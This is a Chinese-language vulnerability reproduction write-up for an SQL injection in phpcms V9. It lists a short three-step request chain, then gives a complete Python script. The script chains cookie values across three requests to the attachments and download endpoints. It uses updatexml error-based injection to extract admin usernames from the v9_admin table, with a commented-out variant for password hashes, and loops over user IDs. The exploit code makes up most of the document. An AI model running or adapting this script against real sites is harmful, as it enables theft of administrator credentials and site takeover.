phpcms V9 版本存在SQL注入漏洞,漏洞复现如下
0x00 以GET方式访问如下链接,得到返回包里mvbpqw_siteid值:
?m=wap&c=index&a=init&siteid=1
0x01 构造SQL语句,将0x00中的mvbpqw_siteid值代入下面链接,以POST方式发起请求
0x02 将0x01步中的json值代入下面链接中,以POST方式请求,显示敏感的报错信息
0x03 漏洞复现完成,下面是python脚本测试
完整代码如下:#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
import re
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Cookie": "PHPSESSID=f0cesl88cj5ji86120ea2kpak4",
"Upgrade-Insecure-Reque": "1",
"content-Type":"application/x-www-form-urlencoded",
"Content-Length": "0"
}
def get_1_url(num):
url_1 = "http://127.0.0.1/index.php?m=wap&c=index&a=init&siteid=1"
response_1 = requests.get(url_1,headers=headers)
cookie = response_1.headers["Set-Cookie"][13:]
get_2_url(cookie,num)
def get_2_url(cookie,num):
#拼接字符串,截取报错信息中的部分信息内容
# url_2 = "http://127.0.0.1/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3d%25*27+and+updatexml(1%2cconcat(0x7e%2c(SELECT+" \
# "substring((password)%2c30%2c40)+FROM+v9_admin+where+userid%3d{}))%2c1)%23%26m%3d1%26f%3dhanwei%26modelid%3d2%26catid%3d7%26".format(str(num))
#报错显示用户名
url_2 = "http://127.0.0.1/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3d%25*27+and+updatexml(1%2cconcat(0x7e%2c(SELECT+substring" \
"((username)%2c1%2c40)+FROM+v9_admin+where+userid%3d{}))%2c1)%23%26m%3d1%26f%3dhanwei%26modelid%3d2%26catid%3d7%26".format(str(num))
data = {
"userid_flash" : cookie
}
response_2 = requests.post(url_2,data=data,headers=headers)
cookie_2 = response_2.headers["Set-Cookie"][15:]
get_3_url(cookie,cookie_2)
def get_3_url(cookie,cookie_2):
url_3 = "http://127.0.0.1/index.php?m=content&c=down&a_k={}".format(cookie_2) data = {
"userid_flash": cookie
}
response_3 = requests.post(url_3, data=data, headers=headers)
if "XPATH syntax error" in response_3.text:
hs_str = response_3.text
hs_user = re.findall(r".*Message : </b> XPATH syntax error: '(.*?)' <br />",str(hs_str), re.S)[0]
with open("hs_user_add_V.txt","a+",encoding="utf-8") as f:
f.write(hs_user+"\n")
print(hs_user)
if __name__ =="__main__":
for num in range(1,100):
get_1_url(num)
0x01 测试